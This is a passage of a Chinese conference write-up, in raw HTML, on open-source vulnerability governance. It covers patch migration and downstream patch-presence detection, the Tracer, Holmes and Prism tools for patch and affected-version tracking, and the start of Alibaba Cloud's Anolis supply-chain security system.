0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">漏洞数据增强，类似搜索引擎的思路<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1 漏洞补丁和漏洞描述存在多维度的关联性，如漏洞类型、影响、位置，有助于定位补丁的commit；<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2 漏洞描述和补丁关联弱时，引入排序模型，把commits和漏洞进行关联排序，猜出漏洞关联度高的补丁commit<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img data-imgfileid="100000335" data-ratio="0.6045130641330166" data-type="png" data-w="842" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=7d3ec11b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUddicMfwaCcjg2dvuu4aQPXLT6K6YIYiasY5aq8oxMpJAq7qWLgAwZ44A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">漏洞治理：部署补丁是主要方式<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">漏洞挖掘、数据增强基础上，希望无论上游软件还是下游软件，都去部署补丁，才能让整个软件变得安全；怎样让上下游都部署补丁，是治理漏洞最关键的手段。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">上游采用多分支开发和维护，有很多分支需要做补丁的迁移，在上游修复漏洞。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">下游以手机为例，有多产品、多版本，内部的漏洞管理业非常复杂。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><br/></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000336" data-ratio="0.6124121779859485" data-type="png" data-w="854" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=837c9014&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU3j1ZQxIox7OcESURP7ibzc6va4tHhkvvibuYCPL7df7kGcn1BDQqBtjQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000337" data-ratio="0.6280701754385964" data-type="png" data-w="855" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c7301c97&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUCia730RbJZKiaiahhaQptK8yGX7EzeB8eM8mARtk80pFiaxvzop8olFmHw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">实证研究：超过80%的分支没有部署补丁，超过80%的补丁迁移需要人工参与<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><img class="rich_pages wxw-img" data-imgfileid="100000338" data-ratio="0.6286043829296425" data-type="png" data-w="867" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d5e4ab80&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUiagy0uAvpkYG69ZGJkIvA0VStuic2QST8TiavgEPl46CicSicLRMYDrGbMg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><br/></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">自动化迁移补丁：基于一个补丁，去修复其他分支；<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">首先要从开发者角度理解补丁的语义，如何修复漏洞；例如是函数误用、输入限制，进行危险函数替换和验证，提高成功率。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">有些分支和补丁不符合前置条件，还是需要手工迁移。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img data-imgfileid="100000339" data-ratio="0.5791324736225087" data-type="png" data-w="853" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=141ba2fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUSgHvunicByYheujxPzyo3GwaEsciarw0Mo8W8W4H3icda1CLshtHGib5xw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">下游：下游最主要的问题是不知道补丁打了没有<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">需要工具，可以直接对制品进行分析，需要跨语言分析能力<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">需要检测很多厂商的定制化修改的代码，而且需要检测细微的变化，如‘&gt;’变成‘&lt;’；要更聚焦于漏洞提供修复建议。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000340" data-ratio="0.6208920187793427" data-type="png" data-w="852" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=acd97025&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUoKvkHXpDeojIMGpgbQEyr8o4ulvrA5HDpjsbibicnczcMbujcFmVDeXw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">厂商交流，如何判断手机操作系统是否打了补丁，开发了两个工具，在下游内核取得好效果<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000341" data-ratio="0.6171967020023557" data-type="png" data-w="849" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8b4970f1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUfc5ibjOlkF5yNWkF62lsuKwVKWkM6nvnmnmCnibsGdCiatgyHfOFKORuw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">* LLM: PDiff、BScout：提出了一种基于语义分析的补丁存在性检测新方法，基于污点分析等方法提取补丁的控制流和数据流语义信息，通过对上游补丁和下游内核提取语义特征向量,然后对比相似度,来判断补丁是否被集成。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000342" data-ratio="0.6064073226544623" data-type="png" data-w="874" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=57ccb2fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUCsHKt5o5evuEEusPEEEARVJUWwpco3jm5lQPuicJ47X9Vb2QrXvNbFw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img data-imgfileid="100000343" data-ratio="0.7174418604651163" data-type="png" data-w="860" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=f83a2b61&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUXbPww1xP2zZ81ojYSbfvKbMqxwSb12spgusx7Nz316tfXpiadTbdcYQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">【思】非常接近企业实际应用场景，实际需求都是有的，高校有的是各种金刚钻，企业缺底层的金刚钻，这些往往安全厂商提供，但是高校的工具估计更加独立、灵活，也值得甲方和高校共同去打磨，没准就能迭代出用户喜爱的新的根技术。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);font-size: 14px;">问题：如何移除和漏洞修复无关的代码<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">核心在于理解漏洞，补丁不是简单的codediff，那样很难做到精确，可以理解内在后建模（不同语言、软件建模是不一样的），分析危险函数，通过危险函数分析补丁，更好地理解漏洞和补丁；基于补丁语义分析，可以检测漏洞，分析补丁、分析影响版本。很多技术都有tradeoff， 需要叠加在一起，组合使用，才能更好地落地、扩展。<o:p></o:p></span></p><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);font-size: 14px;">问题：业务逻辑型漏洞应对，例如闰年漏洞<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">漏洞不包含业务逻辑型漏洞，但是不全面。业务逻辑型漏洞的识别比安全漏洞更难识别，很多取决于业务本事，包括认证的逻辑，和业务相关，更难检测。<o:p></o:p></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">主题3：开源漏洞数据治理 吴苏晟 复旦大学</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);"><o:p></o:p></span></h1><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="550" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">主题要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 开源漏洞数据库的现状：当前漏洞数据库中开源软件漏洞补丁的质量存在问题，补丁覆盖率低，且常有遗漏，这影响了下游分析的准确性和有效性。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. Tracer：多源知识融合的补丁追踪：Tracer是一种新提出的方法，通过结合多个数据源，如NVD、Debian和RedHat，来自动追踪和识别CVE的补丁信息，提高了漏洞数据库的完整性和准确性。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. Holmes：精确识别影响库及生态系统：Holmes工具使用学习排序技术，从多个来源收集证据，对组件进行相关性排序，以识别每个漏洞真正影响的库及其所属生态系统，解决了现有SCA工具的不足。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. Prism：细粒度的漏洞影响版本分析：Prism方法专注于分析漏洞影响的具体版本，通过精确的方法确定受影响和未受影响的版本，提高了风险分析的精度。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 伏羲平台的高质量知识汇聚：Tracer、Holmes和Prism等工具作为伏羲平台的一部分，提供了高质量的知识汇聚，支持高精度的风险分析和技术使能，为漏洞治理提供了强有力的支撑。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000344" data-ratio="0.6" data-type="png" data-w="870" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2825ef6c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU6h7ibEB9TUtIdF80eoeArwEEQRzic1dibdCIkcqMFLREiaOYuC3zdcQHSw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></h2><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">数据分析<o:p></o:p></span></h2><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：漏洞数据库补丁质量不理想<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);font-size: 14px;">问题：如何针对库、生态进行漏洞影响分析<o:p></o:p></span></h3><h3 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);font-size: 14px;">问题：如何确定漏洞影响的版本<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">每个厂商背后都有庞大的漏洞库，但是否能够支撑下游分析？<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">针对开源软件漏洞补丁开展了实证研究，以了解当前漏洞数据库中开源软件漏洞补丁的质量和特征。研究发现当前漏洞数据库中开源软件漏洞补丁的质量并不理想。补丁缺失情况较为普遍，当前漏洞数据库中漏洞的补丁覆盖率仅为 41.0% 左右。对于有多个补丁的漏洞，当前漏洞数据库经常会遗漏一些补丁。<o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">Tracer: 基于多源知识融合的补丁追踪方法<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">针对当前漏洞数据库中补丁信息缺失和不准确的问题，提出了一个基于多源知识的方法Tracer来自动追踪CVE的补丁信息，输入是CVE的ID，输出是安全补丁。Tracer可以极大地补充或增强当前的漏洞数据库，也有助于用户更准确、更快速地识别到补丁，也适用于多补丁的场景，能召回、查准CVE，也能发现漏洞遗漏生态的情况。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">*LLM：Tracer提出一种基于多源知识融合的补丁追踪方法,根据NVD，debian,
redhat为基础构建引用网络,针对这些网络节点做补丁识别，综合分析漏洞报告、代码仓库、补丁注释等多源异构信息,从而精准定位漏洞对应的修复补丁代码。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000345" data-ratio="0.6002331002331003" data-type="png" data-w="858" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ac04a827&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU8ckDAnH3pViavTj8Pq938ia2WibGngGoic2BkmL07Vp77o8MmWr54LSBUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">Holmes：由CVE识别影响库及所属生态<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">现有的软件组成分析(SCA)工具依赖漏洞数据库来识别软件应用程序使用的易受攻击的库,但手动维护这种漏洞数据库的&#34;受影响库&#34;和&#34;所属生态系统&#34;信息是一项费力且容易出错的工作。现有的极值多标签学习方法由于标签库有限且未考虑生态系统因素,导致预测漏洞影响库的效果不佳。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">对现有几个主流漏洞数据库中&#34;受影响库&#34;和&#34;所属生态系统&#34;两个字段的质量进行实证评估,发现存在明显的不一致性和不准确性。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">提出Holmes工具,通过学习排序(learning-to-rank)技术,从多个来源收集各种关于库和生态系统的证据,证据范围cve、组件库、源码以及其他元数据，根据这些证据数据对每一个组件进行计算，对全量组件进行相关性排序,从而识别出每个漏洞真正影响的库及其所属生态系统。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000346" data-ratio="0.5872093023255814" data-type="png" data-w="860" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5641e9aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICURBZW5vUTWx3picYz2qfkHOoITicUJtbZHUTolnd3sbmeHzKnxicWxMUUg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">Prism：开源漏洞影响版本的分析方法<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">更细颗粒度的工作，对于漏洞,确定其影响和未影响的版本信息是非常重要的,但由于需要安全专业知识和大量人工努力去确认每个版本,而版本数量通常很多,因此在公开的漏洞数据库中,这种受影响版本信息的质量都非常低下。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000347" data-ratio="0.5972060535506403" data-type="png" data-w="859" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=91e244ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUvRcvCLibnbY5ZaqPmeJ6utwFkGZXhL5dh0FONOmWv1xvI8Q1B6PRqfw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">伏羲平台<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">Tracer, Holmes, Prism, 属于伏羲平台的“高质量知识汇聚”，为高精度风险分析和高精度使能技术提供支撑。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000348" data-ratio="0.5974178403755869" data-type="png" data-w="852" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=b00cd999&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUtyw6bSKNIG6HOkpvTLtoPWJdZEJuzicl5Wp5bfqqtZO59tq0yVgGT4Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000349" data-ratio="0.6045977011494252" data-type="png" data-w="870" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=3825a3fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU2SB2vooxKCoCG4b609pYnibflLAB9TmjRRRK4aBD7noiaho65MISn7Nw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h3 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">问题：CVE中没有细颗粒度信息，如何定位危险函数？<o:p></o:p></span></h3><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">补丁和修改方法有共性，根据漏洞修补和类型、修改了哪些代码，关键变量是什么，可以进一步分析出危险函数。<o:p></o:p></span></p><h1 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);font-size: 20px;">主题4：龙蜥软件供应链安全体系 郑耿 阿里云</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);"><o:p></o:p></span></h1><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">龙蜥的方案很成熟，领先，特地说明引用、借鉴、参与的行业实践，踏实谦逊<o:p></o:p></span></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="546" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;"><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">主题要点<o:p></o:p></span></h2><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 龙蜥对供应链安全的关注：由于操作系统(OS)的安全稳定性至关重要，且生态系统复杂，依赖众多软件包，龙蜥特别关注供应链安全，以确保整体软件生态的可靠性和安全性。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 研发流程中的安全评审机制：龙蜥在研发流程的每个步骤中都实施了评审机制，包括开源评估、三方依赖风险评估、编码质量评估等，确保了从源头到交付的全过程安全可信。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 供应链安全架构的三重目标：龙蜥的供应链安全架构旨在实现成分透明可追溯、可评估和可信任的目标，通过基础数据、原子能力和功能产品等多层次的安全体系来构建。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">4. 体系落地与参考标准：龙蜥的供应链安全体系落地实施了安全态势洞察、风险防护、可信生产流程和主动安全能力建设等措施，并参考了SLSA和S2C2F等国际安全标准和框架。<o:p></o:p></span></p><p style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">5. 核心能力建设与未来规划：龙蜥在知识图谱、统一签名服务、可重现构建、代码克隆检测和AI代码安全等方面进行了核心能力建设，未来将继续完善基础数据、加强工具评估分析和全生命周期管理，以及探索AI在代码安全中的应用。<o:p></o:p></span></p></td></tr></tbody></table><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000350" data-ratio="0.5921205098493627" data-type="png" data-w="863" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=91777ba9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUPqGnico7jLrGISuTSTqcZhsKiacQa7pNvHtzejMJHy7LNMxKFRv4ibd7A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">龙蜥为什么关注供应链<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">os安全稳定和关键，生态复杂，依赖2400个软件包，依赖知识图谱非常复杂。<o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">研发流程<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">每一个步骤都有评审机制。开源评估评审，三方依赖风险评估，编码质量评估，安全可信构建，制品安全性测试和签名，可信分发，运营威胁感知，cve修复<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000351" data-ratio="0.6445993031358885" data-type="png" data-w="861" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2856b4a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUCe5yzMr5HMcro6zS44gO5lcx6h9WjIzCM9AmXR5vWGTHbnRrFA7Jwg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">供应链安全架构<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="text-decoration: underline;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">安全目标</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">成分透明可追溯：组件精准；关系清晰完善；追溯能力强<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">可评估：依赖组件可评估，开发过程可评估，交付软件可评估<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: 